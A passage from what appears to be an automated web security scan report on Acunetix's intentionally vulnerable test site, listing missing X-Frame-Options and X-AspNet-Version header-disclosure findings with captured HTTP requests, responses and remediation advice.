href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        26. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

  4. Risk=Low, Confidence=High (29)

    1. http://testaspnet.vulnweb.com (29)

      1. X-AspNet-Version Response Header (29)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
